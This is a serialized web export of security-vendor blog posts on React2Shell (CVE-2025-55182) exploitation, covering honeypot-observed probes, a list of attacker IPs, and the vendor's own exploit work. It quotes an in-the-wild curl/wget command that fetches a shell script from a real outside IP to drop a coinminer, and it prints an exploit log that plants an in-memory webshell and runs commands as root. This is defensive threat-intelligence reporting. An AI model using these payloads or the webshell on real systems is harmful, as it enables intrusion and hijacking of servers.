yourself.",[61,22645,202],{"id":201},[18,22647,10768,22648,1246,22651,10775,22654,10779,22657,1246,22662,982,22667,59],{},[47,22649,283],{"href":281,"rel":22650},[51],[47,22652,216],{"href":1258,"rel":22653},[51],[47,22655,1251],{"href":1249,"rel":22656},[51],[47,22658,22660],{"href":10789,"rel":22659},[51],[1131,22661,10793],{},[47,22663,22665],{"href":10796,"rel":22664},[51],[1131,22666,10801],{},[47,22668,22670],{"href":19435,"rel":22669},[51],[1131,22671,19437],{},[18,22673,1228,22674,1234,22677,1240,22680,1246,22683,1246,22686,1255,22689,1260],{},[47,22675,1233],{"href":10806,"rel":22676},[51],[47,22678,1239],{"href":1237,"rel":22679},[51],[47,22681,1245],{"href":1243,"rel":22682},[51],[47,22684,1251],{"href":1249,"rel":22685},[51],[47,22687,283],{"href":281,"rel":22688},[51],[47,22690,216],{"href":1258,"rel":22691},[51],[2901,22693,22694],{},"html pre.shiki code .siCPE, html code.shiki .siCPE{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sLACW, html code.shiki .sLACW{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .ss--_, html code.shiki .ss--_{--shiki-light:#90A4AE;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .saDeg, html code.shiki .saDeg{--shiki-light:#39ADB5;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sEff5, html code.shiki .sEff5{--shiki-light:#9C3EDA;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sh1VR, html code.shiki .sh1VR{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#CFCFC2}html pre.shiki code .sINAO, html code.shiki .sINAO{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#CFCFC2}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}",{"title":219,"searchDepth":220,"depth":220,"links":22696},[22697,22698,22699,22700,22701,22702],{"id":22053,"depth":220,"text":22054},{"id":22102,"depth":220,"text":22103},{"id":22179,"depth":220,"text":22180},{"id":22281,"depth":220,"text":22282},{"id":22636,"depth":220,"text":22637},{"id":201,"depth":220,"text":202},"VulnCheck reviewed the full wave of React2Shell exploits published on GitHub, discarding about half as broken or misleading and surfacing several genuinely interesting techniques from the rest. We curated the usable set, highlighted the notable variants, and made the entire approved dataset freely available in VulnCheck's Exploit Database (XDB).",{"slug":22705},"react2shell-github","\u002Fblog\u002Freact2shell-github",{"title":21701,"description":22703},"blog\u002Freact2shell-github",[242,1279,22710],"xdb","UcOC6XrXnZufiTzJHqOOV6vDRYPhxT4v6zzkKkZ5S98",{"id":22713,"title":21694,"articles":22714,"authors":22719,"body":22721,"date":22718,"description":23268,"extension":234,"image":7,"link":7,"meta":23269,"navigation":237,"path":23271,"seo":23272,"series":7,"stem":23273,"subtype":7,"tags":23274,"__hash__":23276},"blog\u002Fblog\u002Freact2shell-canaries.md",[22715],{"title":22716,"source":12191,"link":22717,"date":22718},"Broad Exploit Activity Targets React2Shell Flaw","https:\u002F\u002Fdecipher.sc\u002F2025\u002F12\u002F08\u002Fbroad-exploit-activity-targets-react2shell-flaw\u002F","2025-12-09",[22720],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":22722,"toc":23262},[22723,22726,22731,22757,22761,22776,22780,22784,22794,22798,22802,22805,22809,22819,22823,22827,22833,22837,22841,22854,22863,22867,22871,22883,22887,22891,22903,22907,22911,22914,22918,22921,22934,22938,22942,22952,22957,22961,22972,22977,22981,22988,22993,22997,23006,23009,23014,23018,23021,23023,23026,23030,23214,23216,23242],[263,22724],{":list":22725,"ico":266,"title":20},"[\"Attackers are rapidly adopting React2Shell, but their exploitation techniques remain simple and easily detectable.\",\"Probing techniques show far more variation than the payloads, which are almost entirely download-and-execute across the IPs hitting our canaries.\",\"VulnCheck Canary Intelligence shows how attackers are operationalizing React2Shell, and the IPs we’ve collected are listed below for defenders to use.\"]",[18,22727,22728],{},[1131,22729,22730],{},"The data used in this blog was collected at 5pm EST on December 8, 2025.",[18,22732,22733,1246,22736,22740,22741,22744,22745,22749,22750,22753,22754,59],{},[47,22734,10533],{"href":10531,"rel":22735},[51],[47,22737,22739],{"href":21675,"rel":22738},[51],"React2Shell",", is an appealing bug for attackers because it offers multiple paths to exploitation. Inside VulnCheck, the ",[47,22742,1245],{"href":1243,"rel":22743},[51]," team spends time on the nuances, such as how the in-memory ",[47,22746,22748],{"href":22230,"rel":22747},[51],"webshell"," works and how bypasses develop. Real-world attackers often take a different approach, folding the bug into the tooling and workflows they already rely on. To understand how React2Shell is appearing in real attacks, we looked at the probes and payloads hitting our ",[47,22751,283],{"href":281,"rel":22752},[51],". Our research team also has exploit, PoC, and variant analysis ",[47,22755,305],{"href":20134,"rel":22756},[51],[61,22758,22760],{"id":22759},"early-probes-and-first-payloads","Early Probes and First Payloads",[18,22762,22763,22764,22767,22768,22771,22772,22775],{},"The first React2Shell payload that hit our canary network, on December 5 around 5 am EST, looked relatively benign. It was a straightforward vulnerability check from ",[886,22765,22766],{},"95.214.52.170"," that issued a ",[886,22769,22770],{},"ping"," to ",[886,22773,22774],{},"45.157.233.80"," to confirm successful exploitation.",[68,22777],{"src":22778,"alt":21258,"className":22779},"\u002Fblog\u002Freact2shell-canaries\u002F1-light.png",[10876,21260],[68,22781],{"src":22782,"alt":21258,"className":22783},"\u002Fblog\u002Freact2shell-canaries\u002F1.png",[21265,21266],[18,22785,22786,22787,1554,22790,22793],{},"But upon success, this attacker returned, fetching binaries from ",[886,22788,22789],{},"31.56.27.76",[886,22791,22792],{},"193.34.213.150",". Their follow-up activity consisted of downloading and executing a binary hosted elsewhere.",[68,22795],{"src":22796,"alt":21292,"className":22797},"\u002Fblog\u002Freact2shell-canaries\u002F2-light.png",[10876,21260],[68,22799],{"src":22800,"alt":21292,"className":22801},"\u002Fblog\u002Freact2shell-canaries\u002F2.png",[21265,21266],[18,22803,22804],{},"This pattern has been consistent over the last few days: a variety of vulnerability probes followed by the download and execution of weaponized payloads. The probes are worth examining in more detail.",[61,22806,22808],{"id":22807},"vulnerability-probing","Vulnerability Probing",[18,22810,22811,22812,22815,22816,4606],{},"The vulnerability checks we’ve observed fall into five main flavors. The first is ",[886,22813,22814],{},"uname","-based. A successful check gives the attacker immediate system details on Linux hosts, such as the distribution and architecture. Below is an example probe from ",[886,22817,22818],{},"74.201.72.250",[68,22820],{"src":22821,"alt":21314,"className":22822},"\u002Fblog\u002Freact2shell-canaries\u002F3-light.png",[10876,21260],[68,22824],{"src":22825,"alt":21314,"className":22826},"\u002Fblog\u002Freact2shell-canaries\u002F3.png",[21265,21266],[18,22828,22829,22830,59],{},"The second most common probe is math-based. Honeypots rarely return the correct output, which makes this type of check appealing to attackers. It comes in two forms: a Linux variant and a PowerShell variant, often sent together by the same actor. The following example came over a single TCP connection from ",[886,22831,22832],{},"143.110.184.254",[68,22834],{"src":22835,"alt":21330,"className":22836},"\u002Fblog\u002Freact2shell-canaries\u002F4-light.png",[10876,21260],[68,22838],{"src":22839,"alt":21330,"className":22840},"\u002Fblog\u002Freact2shell-canaries\u002F4.png",[21265,21266],[18,22842,22843,22844,22847,22848,22853],{},"It’s also worth noting the hard-coded multipart boundary. ",[886,22845,22846],{},"------WebKitFormBoundaryx8jO2oVc6SWP3Sad"," matches the one used in vulhub’s ",[47,22849,22852],{"href":22850,"rel":22851},"https:\u002F\u002Fraw.githubusercontent.com\u002Fvulhub\u002Fvulhub\u002Fmaster\u002Freact\u002FCVE-2025-55182\u002FREADME.md",[51],"exploit",", which only runs id. It’s another reminder that attackers frequently reuse public proof-of-concept code with minimal changes.",[18,22855,22856,22857,22859,22860,59],{},"The third flavor is similar to the previous approach. Forcing the target to perform a calculation helps distinguish a real system from a honeypot, so some attackers use an ",[886,22858,2390],{}," echo as their probe. Here is an example from ",[886,22861,22862],{},"79.124.40.174",[68,22864],{"src":22865,"alt":21345,"className":22866},"\u002Fblog\u002Freact2shell-canaries\u002F5-light.png",[10876,21260],[68,22868],{"src":22869,"alt":21345,"className":22870},"\u002Fblog\u002Freact2shell-canaries\u002F5.png",[21265,21266],[18,22872,22873,22874,22877,22878,22880,22881,4606],{},"I personally think the math-based approaches are the strongest, but another useful variant just executes ",[886,22875,22876],{},"whoami",". It may look less capable, but because ",[886,22879,22876],{}," runs on both Linux and Windows, it can still give attackers a quick sense of the environment. Here is an example from ",[886,22882,22766],{},[68,22884],{"src":22885,"alt":21422,"className":22886},"\u002Fblog\u002Freact2shell-canaries\u002F6-light.png",[10876,21260],[68,22888],{"src":22889,"alt":21422,"className":22890},"\u002Fblog\u002Freact2shell-canaries\u002F6.png",[21265,21266],[18,22892,22893,22894,22899,22900,4606],{},"The last flavor is much less common. Following the approach used in ",[47,22895,22898],{"href":22896,"rel":22897},"https:\u002F\u002Fslcyber.io\u002Fresearch-center\u002Fhigh-fidelity-detection-mechanism-for-rsc-next-js-rce-CVE-2025-55182-CVE-2025-66478\u002F",[51],"AssetNote’s"," scanner, some attackers simply trigger the vulnerable codepath to identify a system. Here is an example from ",[886,22901,22902],{},"167.86.107.35",[68,22904],{"src":22905,"alt":21507,"className":22906},"\u002Fblog\u002Freact2shell-canaries\u002F7-light.png",[10876,21260],[68,22908],{"src":22909,"alt":21507,"className":22910},"\u002Fblog\u002Freact2shell-canaries\u002F7.png",[21265,21266],[18,22912,22913],{},"These probes make up the bulk of the reconnaissance we’ve observed. From there, attackers move on to weaponized payloads.",[61,22915,22917],{"id":22916},"the-payloads","The Payloads",[18,22919,22920],{},"Probing tells us who’s looking. The payloads tell us what they want, which is exactly what Canary Intelligence is built to observe. So far, most of the payload activity has been simple “download and execute” behavior, with only a handful of interesting variations.",[18,22922,22923,22924,22927,22928,22933],{},"While most payloads follow the same simple pattern, a few attempts are more notable. For example, ",[886,22925,22926],{},"85.11.167.3"," appears to be using a WAF bypass documented by ",[47,22929,22932],{"href":22930,"rel":22931},"https:\u002F\u002Fx.com\u002Fpyn3rd\u002Fstatus\u002F1997365282344677807",[51],"@pyn3rd"," on X. The large chunk of random data is intended to evade size restrictions applied by some WAFs.",[68,22935],{"src":22936,"alt":21661,"className":22937},"\u002Fblog\u002Freact2shell-canaries\u002F8-light.png",[10876,21260],[68,22939],{"src":22940,"alt":21661,"className":22941},"\u002Fblog\u002Freact2shell-canaries\u002F8.png",[21265,21266],[18,22943,22944,22945,22947,22948,22951],{},"It’s also worth noting that ",[886,22946,22926],{}," used other, now-defunct methods as part of this activity. Their hosting at ",[886,22949,22950],{},"gfxnick.emerald.usbx.me"," is no longer accessible, suggesting that a portion of the campaign has been abandoned.",[68,22953],{"src":22954,"alt":22955,"className":22956},"\u002Fblog\u002Freact2shell-canaries\u002F9-light.png","Image 9",[10876,21260],[68,22958],{"src":22959,"alt":22955,"className":22960},"\u002Fblog\u002Freact2shell-canaries\u002F9.png",[21265,21266],[18,22962,22963,22964,22967,22968,22971],{},"Several campaigns we captured have already gone quiet, but one that remains active is worth highlighting. It uses ",[886,22965,22966],{},"echo"," piped through ",[886,22969,22970],{},"base64"," to obfuscate its payload.",[68,22973],{"src":22974,"alt":22975,"className":22976},"\u002Fblog\u002Freact2shell-canaries\u002F10-light.png","Image 10",[10876,21260],[68,22978],{"src":22979,"alt":22975,"className":22980},"\u002Fblog\u002Freact2shell-canaries\u002F10.png",[21265,21266],[18,22982,22983,22984,22987],{},"The payload resolves to ",[886,22985,22986],{},"(curl \\-k http:\u002F\u002F59.7.217.245:7070\u002Fc.sh||wget \\--no-check-certificate \\-q \\-O- http:\u002F\u002F59.7.217.245:7070\u002Fc.sh)\\>\\>\u002Fvar\u002Ftmp\u002F5.sh"," which produces a downloader script:",[68,22989],{"src":22990,"alt":22991,"className":22992},"\u002Fblog\u002Freact2shell-canaries\u002F11-light.png","Image 11",[10876,21260],[68,22994],{"src":22995,"alt":22991,"className":22996},"\u002Fblog\u002Freact2shell-canaries\u002F11.png",[21265,21266],[18,22998,22999,23000,23005],{},"All of this effort resolves into a ",[47,23001,23004],{"href":23002,"rel":23003},"https:\u002F\u002Fwww.virustotal.com\u002Fgui\u002Ffile\u002Fcc17c5a982a899986c292a41cdc0dfe75b7126b4833521a9b010722a382d11e8\u002Fcommunity",[51],"coinminer",", which the linked VirusTotal sample confirms.",[18,23007,23008],{},"Another active campaign in our data is the RondoDox botnet. For those unfamiliar, RondoDox rapidly incorporates new exploits but remains easy to detect because its hard-coded user agents give it away.",[68,23010],{"src":23011,"alt":23012,"className":23013},"\u002Fblog\u002Freact2shell-canaries\u002F12-light.png","Image 12",[10876,21260],[68,23015],{"src":23016,"alt":23012,"className":23017},"\u002Fblog\u002Freact2shell-canaries\u002F12.png",[21265,21266],[18,23019,23020],{},"We’ve seen many more attackers following this same pattern: download a payload to disk and run it. Our Initial Access team has focused on diskless exploitation and the nuances of React2Shell, but most attackers are succeeding with the simplest possible approach.",[1920,23022,1903],{"id":1902},[18,23024,23025],{},"Despite the flexibility of React2Shell, most attackers are sticking to familiar workflows: probe, download, execute. The nuance is in the probing, not the payloads. As new campaigns emerge, Canary Intelligence will continue to provide a view into how attackers are adapting the vulnerability to their tooling. A list of the IPs observed in our data is included below.",[61,23027,23029],{"id":23028},"observed-addresses-exploiting-cve-2025-55182","Observed Addresses Exploiting CVE-2025-55182",[307,23031,23032,23039],{},[310,23033,23034],{},[313,23035,23036],{},[316,23037,23038],{},"IP Addresses",[336,23040,23041,23045,23050,23055,23059,23063,23067,23072,23077,23082,23087,23092,23097,23102,23107,23112,23117,23122,23126,23131,23136,23141,23146,23151,23156,23161,23166,23171,23175,23180,23185,23190,23195,23200,23204,23209],{},[313,23042,23043],{},[341,23044,22766],{},[313,23046,23047],{},[341,23048,23049],{},"192.159.99.95",[313,23051,23052],{},[341,23053,23054],{},"149.50.96.133",[313,23056,23057],{},[341,23058,22862],{},[313,23060,23061],{},[341,23062,22792],{},[313,23064,23065],{},[341,23066,22926],{},[313,23068,23069],{},[341,23070,23071],{},"141.98.82.26",[313,23073,23074],{},[341,23075,23076],{},"95.214.52.169",[313,23078,23079],{},[341,23080,23081],{},"143.198.145.163",[313,23083,23084],{},[341,23085,23086],{},"89.117.50.231",[313,23088,23089],{},[341,23090,23091],{},"116.213.36.244",[313,23093,23094],{},[341,23095,23096],{},"203.145.44.183",[313,23098,23099],{},[341,23100,23101],{},"202.120.234.163",[313,23103,23104],{},[341,23105,23106],{},"202.120.234.124",[313,23108,23109],{},[341,23110,23111],{},"93.147.15.50",[313,23113,23114],{},[341,23115,23116],{},"49.248.192.204",[313,23118,23119],{},[341,23120,23121],{},"173.212.239.200",[313,23123,23124],{},[341,23125,22902],{},[313,23127,23128],{},[341,23129,23130],{},"104.200.73.215",[313,23132,23133],{},[341,23134,23135],{},"87.121.84.52",[313,23137,23138],{},[341,23139,23140],{},"52.53.242.157",[313,23142,23143],{},[341,23144,23145],{},"203.151.66.147",[313,23147,23148],{},[341,23149,23150],{},"181.215.193.5",[313,23152,23153],{},[341,23154,23155],{},"138.99.203.209",[313,23157,23158],{},[341,23159,23160],{},"98.172.84.11",[313,23162,23163],{},[341,23164,23165],{},"95.156.229.82",[313,23167,23168],{},[341,23169,23170],{},"78.108.180.87",[313,23172,23173],{},[341,23174,22818],{},[313,23176,23177],{},[341,23178,23179],{},"183.182.125.198",[313,23181,23182],{},[341,23183,23184],{},"179.43.134.114",[313,23186,23187],{},[341,23188,23189],{},"174.138.2.203",[313,23191,23192],{},[341,23193,23194],{},"162.19.222.42",[313,23196,23197],{},[341,23198,23199],{},"147.135.11.223",[313,23201,23202],{},[341,23203,22832],{},[313,23205,23206],{},[341,23207,23208],{},"1.233.104.29",[313,23210,23211],{},[341,23212,23213],{},"103.239.14.12",[1920,23215,202],{"id":201},[18,23217,10768,23218,1246,23221,10775,23224,10779,23227,1246,23232,1246,23237,59],{},[47,23219,283],{"href":281,"rel":23220},[51],[47,23222,216],{"href":1258,"rel":23223},[51],[47,23225,1251],{"href":1249,"rel":23226},[51],[47,23228,23230],{"href":10782,"rel":23229},[51],[1131,23231,10786],{},[47,23233,23235],{"href":10789,"rel":23234},[51],[1131,23236,10793],{},[47,23238,10798,23240],{"href":10796,"rel":23239},[51],[1131,23241,10801],{},[18,23243,1228,23244,1234,23247,1240,23250,1246,23253,1246,23256,1255,23259,1260],{},[47,23245,1233],{"href":10806,"rel":23246},[51],[47,23248,1239],{"href":1237,"rel":23249},[51],[47,23251,1245],{"href":1243,"rel":23252},[51],[47,23254,1251],{"href":1249,"rel":23255},[51],[47,23257,283],{"href":281,"rel":23258},[51],[47,23260,216],{"href":1258,"rel":23261},[51],{"title":219,"searchDepth":220,"depth":220,"links":23263},[23264,23265,23266,23267],{"id":22759,"depth":220,"text":22760},{"id":22807,"depth":220,"text":22808},{"id":22916,"depth":220,"text":22917},{"id":23028,"depth":220,"text":23029},"We're already seeing active React2Shell exploitation, and defenders need to know what it looks like. VulnCheck Canary Intelligence has captured real attacker probes and payloads, offering early insight into how operators are weaponizing the vulnerability. The post includes detailed examples and a list of observed IPs to support immediate defensive action.",{"slug":23270},"react2shell-canaries","\u002Fblog\u002Freact2shell-canaries",{"title":21694,"description":23268},"blog\u002Freact2shell-canaries",[2941,242,1279,23275],"ip-intel","8-pZsv7P34F1O4W-bRlK1lLpiabgal2awIEcdfDRMlY",{"id":23278,"title":21687,"articles":23279,"authors":23304,"body":23306,"date":23681,"description":23682,"extension":234,"image":7,"link":7,"meta":23683,"navigation":237,"path":23685,"seo":23686,"series":7,"stem":23687,"subtype":7,"tags":23688,"__hash__":23689},"blog\u002Fblog\u002Freacting-to-shells-react2shell-variants-ecosystem.md",[23280,23284,23289,23292,23296,23300],{"title":23281,"source":11228,"link":23282,"date":23283},"Attacks pinned to critical React2Shell defect surge, surpass 50 confirmed victims","https:\u002F\u002Fcyberscoop.com\u002Freact2shell-attacks-surge-50-victims\u002F","2025-12-10",{"title":23285,"source":23286,"link":23287,"date":23288},"Attackers Worldwide are Zeroing In on React2Shell Vulnerability","Security Boulevard","https:\u002F\u002Fsecurityboulevard.com\u002F2025\u002F12\u002Fattackers-worldwide-are-zeroing-in-on-react2shell-vulnerability\u002F","2025-12-11",{"title":23290,"source":10841,"link":23291,"date":22039},"React issues new patches after security researchers flag additional flaws","https:\u002F\u002Fwww.cybersecuritydive.com\u002Fnews\u002Freact-issues-new-patches-after-security-researchers-flag-additional-flaws\u002F807776\u002F",{"title":23293,"source":11228,"link":23294,"date":23295},"React2Shell fallout spreads to sensitive targets as public exploits hit all-time high","https:\u002F\u002Fcyberscoop.com\u002Freact2shell-vulnerability-fallout-spreads\u002F","2025-12-17",{"title":23297,"source":14382,"link":23298,"date":23299},"RondoDox Botnet Exploits Critical React2Shell Flaw to Hijack IoT Devices and Web Servers","https:\u002F\u002Fthehackernews.com\u002F2026\u002F01\u002Frondodox-botnet-exploits-critical.html","2026-01-01",{"title":23301,"source":11228,"link":23302,"date":23303},"Inside Vercel’s sleep-deprived race to contain React2Shell","https:\u002F\u002Fcyberscoop.com\u002Fvercel-cto-security-react2shell-vulnerability\u002F","2026-01-08",[23305],{"name":4410,"avatar":4411,"link":4412,"linkName":4413},{"type":15,"value":23307,"toc":23673},[23308,23322,23328,23331,23337,23341,23344,23347,23367,23370,23387,23400,23406,23412,23416,23419,23428,23431,23439,23446,23449,23495,23498,23501,23505,23508,23524,23527,23535,23556,23570,23577,23581,23584,23606,23613,23621,23623,23630,23632,23653],[18,23309,23310,23311,4641,23314,23317,23318,23321],{},"As ",[47,23312,22739],{"href":21675,"rel":23313},[51],[47,23315,10533],{"href":10531,"rel":23316},[51],") exploits continue to fly, our research team here at VulnCheck is analyzing attack patterns and artifacts across several different dimensions, from in-the-wild payloads and new public exploits to attacking IP volume and target geolocations. As of Monday, December 8, our ",[47,23319,283],{"href":281,"rel":23320},[51]," network is observing hundreds of exploit attempts. The chart below is from shortly before 10 AM ET, and our overall detection volume has already grown by 15-20% since then.",[18,23323,23324],{},[68,23325],{":width":10862,"alt":23326,"src":23327},"Canary detection volume","\u002Fblog\u002Fnextjs-cve-2025-55182\u002Freact2shell_canary_detection_volume.png",[18,23329,23330],{},"Public proof-of-concept (PoC) exploit code has also proliferated significantly, with valid (if derivative) PoCs now approaching triple digits based on our analysis. Notably, however, the public exploits our team has analyzed all target Next.js applications, not React directly. We expect this to change.",[18,23332,23333,23334,59],{},"While most of the community focus is understandably on opportunistic exploitation and commonplace adversary profiles (e.g., botnets, malicious Nuclei scanning), the real opportunities for attackers lie in the dynamic nature of exploitation and payload modification, much of which mean reduced visibility and detection capabilities for defenders. This blog contains our Initial Access Intelligence team’s analysis of the React2Shell exploit ecosystem, potential and existing payload variations, and implications for detection and response. For background on this incident, read our emerging threat blog ",[47,23335,305],{"href":21675,"rel":23336},[51],[61,23338,23340],{"id":23339},"vulncheck-exploits","VulnCheck Exploits",[18,23342,23343],{},"As soon as the VulnCheck Initial Access Intelligence team evaluated the patch for CVE-2025-55182, it was clear that the vulnerability was going to have non-trivial downstream impacts. We immediately began attempting to find a path to execution, monitoring Git forges for new PoCs and relevant repositories, and writing detection signatures for specific variants.",[18,23345,23346],{},"From this, the team was able to deliver the following artifacts before the weekend hit (and before the spike in opportunistic exploitation attempts had been fully realized):",[22,23348,23349,23352,23355,23358,23361,23364],{},[25,23350,23351],{},"An initial weaponized exploit for the Next.js variant that delivers a reverse shell",[25,23353,23354],{},"An exploit utilizing the in-memory attack variant",[25,23356,23357],{},"An additional exploit containing the in-memory webshell variant",[25,23359,23360],{},"A network scanner for Next.js",[25,23362,23363],{},"Four network signatures for exploit variants based on real exploitation observations",[25,23365,23366],{},"Vulnerable Docker containers for testing (Next.js, React RSC, Expo, React Router)",[18,23368,23369],{},"The team has also added support for four additional exploit variants (for a total of seven), with accompanying signatures and PCAPs:",[22,23371,23372,23375,23378,23381],{},[25,23373,23374],{},"React Router: Targets experimental RSC functionality (not enabled by default) in the react-router library (shipped Dec. 9)",[25,23376,23377],{},"Expo: Targets the Expo framework with experimental support for RSC enabled. This version will enumerate the RSC endpoints and turn exploitation automatic (shipped Dec. 9)",[25,23379,23380],{},"React RSC: Targets the original React framework's RSC integration; this is only accessible via direct function calls, which provides a way to hunt for (and exploit) them in paths.",[25,23382,23383,23384,23386],{},"Waku - Targets the Waku framework. This variant uses a slightly different method for achieving RCE by avoiding the missing ",[886,23385,21563],{}," function while using a randomly generated endpoint (which is necessary for exploitation).",[18,23388,23389,23390,23395,23396,23399],{},"The team thought the in-memory exploit variant was particularly nifty and immediately prioritized one of these variants for our ",[47,23391,23394],{"href":23392,"rel":23393},"https:\u002F\u002Fdocs.vulncheck.com\u002Finitial-access\u002F2025-12-05#cve-2025-55182-react-server-components-and-nextjs-deserialization-rce",[51],"Initial Access Intelligence release",". Naturally, we wouldn’t be representing ourselves accurately if we didn’t throw some shells around. Below is a Next.js React2Shell payload that hijacks the HTTP prototype and injects the ",[886,23397,23398],{},"\u002Fvfearh"," path to the web server that executes arbitrary commands like an old-fashioned webshell in memory:",[1354,23401,23404],{"className":23402,"code":23403,"language":1359},[1357],"albinolobster@mournland:~\u002Finitial-access\u002Ffeed\u002Fcve-2025-55182\u002Fwebshell$ .\u002Fbuild\u002Fcve-2025-55182_linux-arm64 -e -rhost 10.9.49.69 -rport 3000 -ell DEBUG\ntime=2025-12-05T14:08:09.776-05:00 level=STATUS msg=\"Starting target\" index=0 host=10.9.49.69 port=3000 ssl=false \"ssl auto\"=false\ntime=2025-12-05T14:08:09.776-05:00 level=STATUS msg=\"Generating webshell payload\"\ntime=2025-12-05T14:08:09.776-05:00 level=STATUS msg=\"Uploading webshell to target\"\ntime=2025-12-05T14:08:19.786-05:00 level=ERROR msg=\"HTTP request error: Post \\\"http:\u002F\u002F10.9.49.69:3000\u002F\\\": context deadline exceeded (Client.Timeout exceeded while awaiting headers)\"\ntime=2025-12-05T14:08:19.786-05:00 level=SUCCESS msg=\"Webshell installed!\" location=http:\u002F\u002F10.9.49.69:3000\u002Fvfearh\ntime=2025-12-05T14:08:19.786-05:00 level=STATUS msg=\"Testing `id`\" testurl=\"http:\u002F\u002F10.9.49.69:3000\u002Fvfearh?z=id\"\ntime=2025-12-05T14:08:19.822-05:00 level=SUCCESS msg=\"uid=0(root) gid=0(root) groups=0(root)\\n\"\ntime=2025-12-05T14:08:19.822-05:00 level=SUCCESS msg=\"Exploit successfully completed\" exploited=true\nalbinolobster@mournland:~\u002Finitial-access\u002Ffeed\u002Fcve-2025-55182\u002Fwebshell$ curl http:\u002F\u002F10.9.49.69:3000\u002Fvfearh?z=ls%20-l\ntotal 168\n-rw-r--r-- 1 root root 77 Dec 4 23:41 jsconfig.json\n-rw-r--r-- 1 root root 92 Dec 4 23:41 next.config.mjs\ndrwxr-xr-x 172 root root 4096 Dec 4 23:41 node_modules\n-rw-r--r-- 1 root root 16384 Dec 4 23:41 notes.db\n-rw-r--r-- 1 root root 123663 Dec 4 23:41 package-lock.json\n-rw-r--r-- 1 root root 467 Dec 4 23:41 package.json\n-rw-r--r-- 1 root root 6028 Dec 4 23:41 seed.sql\ndrwxr-xr-x 3 root root 4096 Dec 4 23:41 src\n\n",[886,23405,23403],{"__ignoreMap":219},[18,23407,23408,23409],{},"We've made the team's in-memory webshell publicly available here: ",[47,23410,22230],{"href":22230,"rel":23411},[51],[61,23413,23415],{"id":23414},"attack-path-observations","Attack Path Observations",[18,23417,23418],{},"One of the immediately interesting components of React2Shell CVE-2025-55182 vulnerability is the usage of custom React Flight Protocol (RFP) chunking logic and how it enables dynamic exploitation and payloads that are actively being used by attackers. VulnCheck’s Canary Intelligence network uses the signatures our Initial Access Intelligence team developed to identify new React2Shell variants being used directly on the internet; we’ve also been analyzing and categorizing public PoCs for our Exploit Database (XDB) that hand-curates exploit data from Git forges. The combination of these capabilities has allowed us to identify a few patterns across ongoing React2Shell exploitation and payloads being utilized by attackers.",[18,23420,23421,23422,23427],{},"This custom RFP protocol is used for React Server Components (previously React Server Actions) to allow execution of React components and logic on the server side. The reason this vulnerability stands out from similar (common) issues is that it doesn’t rely on a well-documented and tested format; instead, the vulnerabilities relies on a set of chunks that are interpreted by the implementation, along with a collection of model strings that allow for ",[47,23423,23426],{"href":23424,"rel":23425},"https:\u002F\u002Fgithub.com\u002Ffacebook\u002Freact\u002Fblob\u002Fv19.0.0\u002Fpackages\u002Freact-server\u002Fsrc\u002FReactFlightReplyServer.js#L908",[51],"dynamic evaluation of the chunks"," (that have side effects on the data being sent). This vulnerability stems from the usage of these chunks to override the server-side variable properties and gain control of the underlying JavaScript object.",[18,23429,23430],{},"While on its face this shares a lot of similarities to something like prototype pollution, the use of a custom protocol and a chunk-based structure allows an attacker a few huge advantages in the evasion and post-exploitation department:",[22,23432,23433,23436],{},[25,23434,23435],{},"Dynamic generation and obfuscation utilizing the model chunk logic",[25,23437,23438],{},"Direct interaction with the JavaScript runtime",[18,23440,23441,23442,23445],{},"Since the chunking logic of RFP can use its own internal references, it is possible to do complex recursive references in addition to utilizing the string model `",[886,23443,23444],{},"$`"," prefixed types often on JSON objects sent in the body. In reality, this means that most of the exploitation attempts are generating multiple chunks (often via the NextJS multipart HTTP handling in BusBoy) that then reference each other dynamically and utilize the internal RFP logic to modify behavior. This means that it is possible to do things such as recreate strings or array values that you might see in obfuscated JavaScript directly inside of the RFP requests, but also with the added layer of specialized and unique RFP types.",[18,23447,23448],{},"For example, here is a tiny subset of RFP model types that might be used by attackers to modify the flow the 